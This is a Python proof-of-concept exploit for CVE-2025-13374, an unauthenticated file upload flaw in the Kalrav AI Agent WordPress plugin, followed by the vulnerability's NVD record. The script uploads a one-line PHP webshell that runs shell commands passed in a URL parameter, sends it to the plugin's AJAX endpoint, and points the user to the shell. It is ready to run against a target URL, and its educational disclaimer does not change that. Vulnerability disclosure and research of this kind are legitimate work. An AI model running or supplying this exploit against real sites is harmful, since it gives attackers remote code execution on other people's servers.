CVE-2025-13374

#!/usr/bin/env python3 """ CVE-2025-13374 PoC - Kalrav AI Agent Plugin Arbitrary File Upload Note: This PoC is for educational and security research purposes only. """ import requests import sys def upload_webshell(target_url, webshell_content): """ Upload a webshell to target WordPress site with Kalrav AI Agent plugin. """ # Prepare the webshell file files = { 'file': ('shell.php', webshell_content, 'application/x-php') } # Target the AJAX endpoint data = { 'action': 'kalrav_upload_file' } try: print(f'[*] Targeting: {target_url}') print(f'[*] Uploading webshell...') # Send the upload request (no authentication required) response = requests.post( f'{target_url}/wp-admin/admin-ajax.php', data=data, files=files, timeout=30 ) if response.status_code == 200: print('[+] Upload request sent successfully') print('[+] Check if shell was uploaded to wp-content/uploads/ or similar directory') print('[+] If successful, access the shell to execute commands') else: print(f'[-] Unexpected response: {response.status_code}') except requests.exceptions.RequestException as e: print(f'[-] Error: {e}') if __name__ == '__main__': if len(sys.argv) < 2: print(f'Usage: python3 {sys.argv[0]} <target_url>') print('Example: python3 CVE-2025-13374.py http://example.com') sys.exit(1) target = sys.argv[1].rstrip('/') webshell = '<?php system($_GET["cmd"]); ?>' # Simple command execution shell upload_webshell(target, webshell)

{"cve": {"id": "CVE-2025-13374", "sourceIdentifier": "[email protected]", "published": "2026-01-24T08:16:05.173", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Kalrav AI Agent plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the kalrav_upload_file AJAX action in all versions up to, and including, 2.3.3. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible."}, {"lang": "es", "value": "El plugin Kalrav AI Agent para WordPress es vulnerable a la carga arbitraria de archivos debido a la falta de validación del tipo de archivo en la acción AJAX kalrav_upload_file en todas las versiones hasta la 2.3.3, inclusive. Esto permite a atacantes no autenticados cargar archivos arbitrarios en el servidor del sitio afectado, lo que podría posibilitar la ejecución remota de código."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://github.com/d0n601/CVE-2025-13374", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/kalrav-ai-agent/tags/2.3.3/kalrav-ai-agent.php#L967", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/kalrav-ai-agent/trunk/kalrav-ai-agent.php#L967", "source": "[email protected]"}, {"url": "https://ryankozak.com/posts/cve-2025-13374", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5dc8feae-fc89-4152-b9b2-2b70e6ccb30b?source=cve", "source": "[email protected]"}]}}